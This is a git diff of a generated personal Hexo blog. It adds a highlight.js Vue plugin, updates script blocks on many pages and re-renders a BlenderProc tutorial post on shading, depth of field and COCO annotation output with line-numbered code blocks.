var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\351\233\204\345\256\211/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\351\233\204\345\256\211/index.html" index 1346f614d3..f6d4846b37 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\351\233\204\345\256\211/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\351\233\204\345\256\211/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

冀 X

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\347\246\217\345\267\236/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\347\246\217\345\267\236/index.html" index 57e989565a..11d41d00ad 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\347\246\217\345\267\236/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\347\246\217\345\267\236/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

如果问我 在虎纠上哪潇洒 话不多说 带你了解

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/index.html b/index.html index 1806fd3315..725e3d9137 100644 --- a/index.html +++ b/index.html @@ -43,8 +43,6 @@ - - @@ -705,6 +703,8 @@

Web-Vue(Vue 核心)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/js/highlightjs-vue/highlightjs-vue.js b/js/highlightjs-vue/highlightjs-vue.js new file mode 100644 index 0000000000..7755e977a0 --- /dev/null +++ b/js/highlightjs-vue/highlightjs-vue.js @@ -0,0 +1,8 @@ +/** + * Minified by jsDelivr using Terser v5.19.2. + * Original file: /npm/highlightjs-vue@1.0.0/dist/highlightjs-vue.cjs.js + * + * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files + */ +"use strict";var module$1=module$1||{};function hljsDefineVue(e){return{subLanguage:"xml",contains:[e.COMMENT("\x3c!--","--\x3e",{relevance:10}),{begin:/^(\s*)( @@ -1167,6 +1165,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/10/index.html b/page/10/index.html index e35ec18871..735c837631 100644 --- a/page/10/index.html +++ b/page/10/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Web-ECharts 地图可视化

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/11/index.html b/page/11/index.html index c3c1c17c98..af1e26ce74 100644 --- a/page/11/index.html +++ b/page/11/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Hexo-Artitalk

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/12/index.html b/page/12/index.html index 7a5f8549cd..a10d087de7 100644 --- a/page/12/index.html +++ b/page/12/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-谌嘉诚 UE4 教程(52-56)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/13/index.html b/page/13/index.html index 039e1172c5..0ee09520cc 100644 --- a/page/13/index.html +++ b/page/13/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-寒假(福州篇)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/14/index.html b/page/14/index.html index edb13e8560..cb9ce506a2 100644 --- a/page/14/index.html +++ b/page/14/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-定州之旅

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/15/index.html b/page/15/index.html index 0265733148..0dcaa25a30 100644 --- a/page/15/index.html +++ b/page/15/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Fourier Contour Embedding for Arbitrary-Sh var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/16/index.html b/page/16/index.html index 21a462faa3..b33e18a13f 100644 --- a/page/16/index.html +++ b/page/16/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-AI

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/17/index.html b/page/17/index.html index d7f12d05d4..5b177ac1e5 100644 --- a/page/17/index.html +++ b/page/17/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-5-更寒风与更雾霾

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/18/index.html b/page/18/index.html index 48a330e715..e07937cd8e 100644 --- a/page/18/index.html +++ b/page/18/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-Blender(粒子篇)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/19/index.html b/page/19/index.html index 1cd3ca80cf..5d23813be2 100644 --- a/page/19/index.html +++ b/page/19/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Building outline extraction from ALS point var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/2/index.html b/page/2/index.html index faf17f137e..9ea67b2d28 100644 --- a/page/2/index.html +++ b/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -711,6 +709,8 @@

Paper-桥边红药的论文

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/20/index.html b/page/20/index.html index 1121e77acc..568fa7db24 100644 --- a/page/20/index.html +++ b/page/20/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Training Deep Networks with Synthetic Data var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/21/index.html b/page/21/index.html index 3c358d8751..8092365771 100644 --- a/page/21/index.html +++ b/page/21/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-PS Beta 25.0

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/22/index.html b/page/22/index.html index c0f48713e3..fbd764a935 100644 --- a/page/22/index.html +++ b/page/22/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-BlenderText-旧

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/23/index.html b/page/23/index.html index e2b966c063..d0194cdc15 100644 --- a/page/23/index.html +++ b/page/23/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-鄂了(一)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/24/index.html b/page/24/index.html index de9d7cb37d..adcb983fc0 100644 --- a/page/24/index.html +++ b/page/24/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-最后的第 19 周

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/25/index.html b/page/25/index.html index 415e507607..eac58ae1fb 100644 --- a/page/25/index.html +++ b/page/25/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-平淡的第 15 周和疯狂的第 16 周< var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/26/index.html b/page/26/index.html index 3477ec497d..a0534d174d 100644 --- a/page/26/index.html +++ b/page/26/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-似乎很平淡的第 13 周和第 14 周< var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/27/index.html b/page/27/index.html index 89fe3807ff..3d0e239b96 100644 --- a/page/27/index.html +++ b/page/27/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

ML-李宏毅-機器如何生成圖像

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/28/index.html b/page/28/index.html index a2942e7ed6..9961227655 100644 --- a/page/28/index.html +++ b/page/28/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Rethinking Text Segmentation:A Novel Dat var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/29/index.html b/page/29/index.html index a56d82a268..12d71c0842 100644 --- a/page/29/index.html +++ b/page/29/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Synthetic Data for Text Localisation in Na var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/3/index.html b/page/3/index.html index 4d3252805a..9112b9835b 100644 --- a/page/3/index.html +++ b/page/3/index.html @@ -43,8 +43,6 @@ - - @@ -715,6 +713,8 @@

Diary-A Survey of Synthetic Data Augmentation Me var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/30/index.html b/page/30/index.html index 06017b4efb..85a3c50247 100644 --- a/page/30/index.html +++ b/page/30/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Pytorch-目标检测 YOLOv5 开源代码项目 var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/31/index.html b/page/31/index.html index e13171391b..cfad7d0e5d 100644 --- a/page/31/index.html +++ b/page/31/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-整理下这段时间看的论文

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/32/index.html b/page/32/index.html index 6c9343fec6..713f221f79 100644 --- a/page/32/index.html +++ b/page/32/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DL-深度学习进阶-自然语言处理-4-word2 var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/33/index.html b/page/33/index.html index 80323547a5..485446a617 100644 --- a/page/33/index.html +++ b/page/33/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DL-深度学习入门-基于Python的理论与 var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/34/index.html b/page/34/index.html index e44883b575..7979b416a8 100644 --- a/page/34/index.html +++ b/page/34/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

ML-李宏毅-Lecture 4-Sequence as input

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/35/index.html b/page/35/index.html index 6fd0db44a1..45737b94d2 100644 --- a/page/35/index.html +++ b/page/35/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Handwritten Optical Character Recognition var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/36/index.html b/page/36/index.html index 62a374cf2c..c2da6b7777 100644 --- a/page/36/index.html +++ b/page/36/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DIP-Convolutions in image processing

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/37/index.html b/page/37/index.html index f09db4d1d0..a30a7a33a5 100644 --- a/page/37/index.html +++ b/page/37/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-闽了

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/38/index.html b/page/38/index.html index 6d44dd9fc7..c9d2aaa30a 100644 --- a/page/38/index.html +++ b/page/38/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DIP-Introductory python tutorials for image proc var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/39/index.html b/page/39/index.html index 5af5c94e19..8b61bbbb80 100644 --- a/page/39/index.html +++ b/page/39/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-冀之前的9月

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/4/index.html b/page/4/index.html index 7b7755cce6..c645b09a66 100644 --- a/page/4/index.html +++ b/page/4/index.html @@ -43,8 +43,6 @@ - - @@ -719,6 +717,8 @@

Course-文本识别 OCR 神器 MMOCR

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/40/index.html b/page/40/index.html index 52645ad033..3e0684711a 100644 --- a/page/40/index.html +++ b/page/40/index.html @@ -43,8 +43,6 @@ - - @@ -720,6 +718,8 @@

Linux-莫烦python学习笔记(linux)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/41/index.html b/page/41/index.html index 6531c4e8e1..af6b78507e 100644 --- a/page/41/index.html +++ b/page/41/index.html @@ -43,8 +43,6 @@ - - @@ -716,6 +714,8 @@

Python-人工智能数学基础(7-9)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/42/index.html b/page/42/index.html index 39f1bcff58..ca267a68a6 100644 --- a/page/42/index.html +++ b/page/42/index.html @@ -43,8 +43,6 @@ - - @@ -712,6 +710,8 @@

Diary-实习的第五周

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/43/index.html b/page/43/index.html index 11d16416dd..1f9913dea3 100644 --- a/page/43/index.html +++ b/page/43/index.html @@ -43,8 +43,6 @@ - - @@ -628,6 +626,8 @@

Hexo-第一篇博客

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/5/index.html b/page/5/index.html index bf8de97f51..f908a963b3 100644 --- a/page/5/index.html +++ b/page/5/index.html @@ -43,8 +43,6 @@ - - @@ -721,6 +719,8 @@

Diary-粤了(三)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/6/index.html b/page/6/index.html index 2a5ca4bed2..b5174f37bb 100644 --- a/page/6/index.html +++ b/page/6/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-保定市城市展示中心

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/7/index.html b/page/7/index.html index 88d2b4e11b..c0fae3a19b 100644 --- a/page/7/index.html +++ b/page/7/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Unsupervised Domain Adaptation by Backprop var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/8/index.html b/page/8/index.html index a8fdb6682b..84abd23e6e 100644 --- a/page/8/index.html +++ b/page/8/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

GAMES104-Rendering

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/9/index.html b/page/9/index.html index ea3708c699..edb54a79b5 100644 --- a/page/9/index.html +++ b/page/9/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Word-论文排版

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html b/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html index 08c45bf8c8..46719f04ab 100644 --- a/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html +++ b/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html @@ -44,8 +44,6 @@ - - @@ -406,7 +404,7 @@

资源

课程

Auto shading

Usage

-
blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output
+
1
blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output

Visualization

-
blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5
+
1
blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5

png

Code

-
# Find the object with name "Sphere"
sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
# Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
sphere.set_shading_mode("auto", 45)

# Find the object with name "Sphere.001"
other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
# Set it to smooth shading, so all angles will be shaded flat.
other_sphere.set_shading_mode("smooth")
+
1
2
3
4
5
6
7
8
9
# Find the object with name "Sphere"
sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
# Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
sphere.set_shading_mode("auto", 45)

# Find the object with name "Sphere.001"
other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
# Set it to smooth shading, so all angles will be shaded flat.
other_sphere.set_shading_mode("smooth")

Camera Depth of Field

Usage

-
blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output
+
1
blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output

Visualization

-
blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5
+
1
blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5

png

Code

设置视点:

-
# Create an empty object which will represent the cameras focus point
focus_point = bproc.object.create_empty("Camera Focus Point")
focus_point.set_location([0.5, -1.5, 3])
-
# define the camera intrinsics
bproc.camera.set_resolution(512, 512)
# Set the empty object as focus point and set fstop to regulate the sharpness of the scene
bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)
+
1
2
3
# Create an empty object which will represent the cameras focus point
focus_point = bproc.object.create_empty("Camera Focus Point")
focus_point.set_location([0.5, -1.5, 3])
+
1
2
3
4
# define the camera intrinsics
bproc.camera.set_resolution(512, 512)
# Set the empty object as focus point and set fstop to regulate the sharpness of the scene
bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)

首先,通过调用 bproc.camera.set_resolution(512, 512) 函数设置相机分辨率为 512x512 像素。

接着,通过调用 bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25) 函数来添加景深效果。其中,focus_point 表示景深的焦点,即相机聚焦的对象(通常为场景中心)。fstop_value 参数控制景深的浅深范围,值越小,景深效果越明显。在本例中,fstop_value 被设置为 0.25,表明所拍摄的场景会呈现出比较明显的景深效果。

COCO annotations

Usage

-
blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output
+
1
blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output

Visualization

使用 blenderproc 可视化 COCO 数据集格式的命令示例:

-
blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]
+
1
blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]

生成 COCO 数据集形式的文件:

png

coco_annoatations.json 里的内容(感觉存了一段乱七八糟的东西):

-
{
"info": {
"description": "coco_annotations",
"url": "https://github.com/waspinator/pycococreator",
"version": "0.1.0",
"year": 2020,
"contributor": "Unknown",
"date_created": "2023-06-04 23:59:39.563796"
},
"licenses": [
{
"id": 1,
"name": "Attribution-NonCommercial-ShareAlike License",
"url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
}
],
"categories": [
{
"id": 1,
"supercategory": "coco_annotations",
"name": "Suzanne"
},

...

{
"id": 9,
"supercategory": "coco_annotations",
"name": "Cube.001"
}
],
"images": [
{
"id": 0,
"file_name": "images/000000.jpg",
"width": 512,
"height": 512,
"date_captured": "2023-06-04 23:59:39.563796",
"license": 1,
"coco_url": "",
"flickr_url": ""
},
{
"id": 1,
"file_name": "images/000001.jpg",
"width": 512,
"height": 512,
"date_captured": "2023-06-04 23:59:39.672089",
"license": 1,
"coco_url": "",
"flickr_url": ""
}
],
"annotations": [
{
"id": 1,
"image_id": 0,
"category_id": 1,
"iscrowd": 0,
"area": 8330,
"bbox": [
184,
98,
144,
114
],
"segmentation": {
"counts": [
94341,

...

94583
],
"size": [
512,
512
]
},
"width": 512,
"height": 512
},

...

{
"id": 16,
"image_id": 1,
"category_id": 9,
"iscrowd": 0,
"area": 25473,
"bbox": [
0,
456,
512,
56
],
"segmentation": {
"counts": [
460,

...

34
],
"size": [
512,
512
]
},
"width": 512,
"height": 512
}
]
}
+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
{
"info": {
"description": "coco_annotations",
"url": "https://github.com/waspinator/pycococreator",
"version": "0.1.0",
"year": 2020,
"contributor": "Unknown",
"date_created": "2023-06-04 23:59:39.563796"
},
"licenses": [
{
"id": 1,
"name": "Attribution-NonCommercial-ShareAlike License",
"url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
}
],
"categories": [
{
"id": 1,
"supercategory": "coco_annotations",
"name": "Suzanne"
},

...

{
"id": 9,
"supercategory": "coco_annotations",
"name": "Cube.001"
}
],
"images": [
{
"id": 0,
"file_name": "images/000000.jpg",
"width": 512,
"height": 512,
"date_captured": "2023-06-04 23:59:39.563796",
"license": 1,
"coco_url": "",
"flickr_url": ""
},
{
"id": 1,
"file_name": "images/000001.jpg",
"width": 512,
"height": 512,
"date_captured": "2023-06-04 23:59:39.672089",
"license": 1,
"coco_url": "",
"flickr_url": ""
}
],
"annotations": [
{
"id": 1,
"image_id": 0,
"category_id": 1,
"iscrowd": 0,
"area": 8330,
"bbox": [
184,
98,
144,
114
],
"segmentation": {
"counts": [
94341,

...

94583
],
"size": [
512,
512
]
},
"width": 512,
"height": 512
},

...

{
"id": 16,
"image_id": 1,
"category_id": 9,
"iscrowd": 0,
"area": 25473,
"bbox": [
0,
456,
512,
56
],
"segmentation": {
"counts": [
460,

...

34
],
"size": [
512,
512
]
},
"width": 512,
"height": 512
}
]
}

在本例中:

-
blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data
+
1
blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data

然后你就会喜提报错:

-
AttributeError: module 'numpy' has no attribute 'bool'.
`np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?
+
1
2
3
4
AttributeError: module 'numpy' has no attribute 'bool'.
`np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?

vis_coco_annotation.py 里找到这行 np.bool_,把它改成 bool_

png

重新开跑!

png

Code

-
# Set some category ids for loaded objects
for j, obj in enumerate(objs):
obj.set_cp("category_id", j + 1)
+
1
2
3
# Set some category ids for loaded objects
for j, obj in enumerate(objs):
obj.set_cp("category_id", j + 1)

要创建 COCO 标注,我们需要渲染实例和类别映射。类别是根据自定义属性 “category_id” 定义的,该属性必须为每个实例预先定义。可以像上面一样通过自定义属性或在加载器中设置 category_id,也可以直接在 .blend 文件中定义。同时,我们还将 “name” 添加到映射中,以便稍后在 COCO 标注写入器中使用对象的名称为类别进行标记。


-
bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])
+
1
bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

调用 bproc.renderer.enable_segmentation_output(map_by=[“category_id”, “instance”, “name”]) 函数激活分割渲染功能。

其中,“category_id”、“instance” 和 “name” 分别表示三种不同的标记方式,即按类别、物体实例和名称进行标记。

这个函数的作用是将场景中的每个物体按照所选的标记方式标记,并将标记信息存储到渲染结果中。例如,如果选择 “category_id” 标记,则每个物体会被分配一个唯一的整数 ID,表示其所属的类别。


-
# Write data to coco file
bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
instance_segmaps=data["instance_segmaps"],
instance_attribute_maps=data["instance_attribute_maps"],
colors=data["colors"],
color_file_format="JPEG")
+
1
2
3
4
5
6
# Write data to coco file
bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
instance_segmaps=data["instance_segmaps"],
instance_attribute_maps=data["instance_attribute_maps"],
colors=data["colors"],
color_file_format="JPEG")

使用 bproc.writer.write_coco_annotations()生成 COCO 数据集。

此函数将注释存储在 coco_annotations.json 中。可选地,您可以在 writer.CocoAnnotationsWriter 配置中设置 "supercategory": "<some_supercategory>",以通过先前分配的自定义属性 "supercategory" 过滤对象。

@@ -499,7 +497,7 @@

Code


bproc.writer.write_coco_annotations()

-
def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
instance_attribute_maps: Optional[List[dict]] = None,
colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
file_prefix: str = "", indent: Optional[Union[int, str]] = None):
+
1
2
3
4
5
6
7
8
def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
instance_attribute_maps: Optional[List[dict]] = None,
colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
file_prefix: str = "", indent: Optional[Union[int, str]] = None):

此函数按以下步骤编写 COCO 注释:

  1. 定位分割图像
  2. @@ -527,35 +525,35 @@

    Code

  3. indent:如果缩进是非负整数或字符串,则注释输出将以该缩进级别进行漂亮的打印。缩进级别为 0、负数或 “” 仅插入换行符。None(默认值)选择最紧凑的表示。使用正整数缩进每个层级缩进那么多空格。如果缩进是字符串(例如 “\t”),那么该字符串用于缩进每个级别。

  4. -
    # 对传入的三个可选参数进行类型检查和处理,确保它们都是列表类型。如果为 None,就改为空列表
    instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
    colors = [] if colors is None else list(colors)
    #(怎么代码风格跟上面的不太一样?)
    if instance_attribute_maps is None:
    instance_attribute_maps = []

    # 检查 colors[0] 是否是四维数组,如果是,则抛出 ValueError 异常。这是因为 BlenderProc 目前不支持渲染立体图像,只能生成左右视图分别的图像/分割图像。
    if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
    "However, you can enter left and right images / segmaps separately.")
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # 对传入的三个可选参数进行类型检查和处理,确保它们都是列表类型。如果为 None,就改为空列表
    instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
    colors = [] if colors is None else list(colors)
    #(怎么代码风格跟上面的不太一样?)
    if instance_attribute_maps is None:
    instance_attribute_maps = []

    # 检查 colors[0] 是否是四维数组,如果是,则抛出 ValueError 异常。这是因为 BlenderProc 目前不支持渲染立体图像,只能生成左右视图分别的图像/分割图像。
    if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
    "However, you can enter left and right images / segmaps separately.")

    -
    # Create output directory
    # 创建输出目录,其中 'images' 目录用于存储转换后的图像。如果该目录已经存在,则不会创建新目录。
    os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)
    +
    1
    2
    3
    # Create output directory
    # 创建输出目录,其中 'images' 目录用于存储转换后的图像。如果该目录已经存在,则不会创建新目录。
    os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)

    -
    # 这些代码块用于查找渲染时生成的 RGB 图像、实例分割图像和属性映射文件的路径
    if not instance_segmaps:
    # 如果 instance_segmaps 列表是空的,则该代码会查找实例分割图像的路径,使用 Utility.find_registered_output_by_key() 方法查找已注册的输出
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
    # 如果找不到 key 为 segmap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块
    raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module before?")

    if not colors:
    # Find path pattern of rgb images
    # 如果 colors 列表为空,则该代码会查找 RGB 图像的路径
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
    # 如果找不到 key 为 rgb_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 RgbRenderer 模块
    raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
    f"ran the RgbRenderer module before?")

    if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # 如果 instance_attribute_maps 列表为空,则该代码会查找实例分割图像到名称、类别标签的映射文件的路径
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
    # 如果找不到 key 为 segcolormap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块,并将 map_by 参数设置为 instance
    raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    # 这些代码块用于查找渲染时生成的 RGB 图像、实例分割图像和属性映射文件的路径
    if not instance_segmaps:
    # 如果 instance_segmaps 列表是空的,则该代码会查找实例分割图像的路径,使用 Utility.find_registered_output_by_key() 方法查找已注册的输出
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
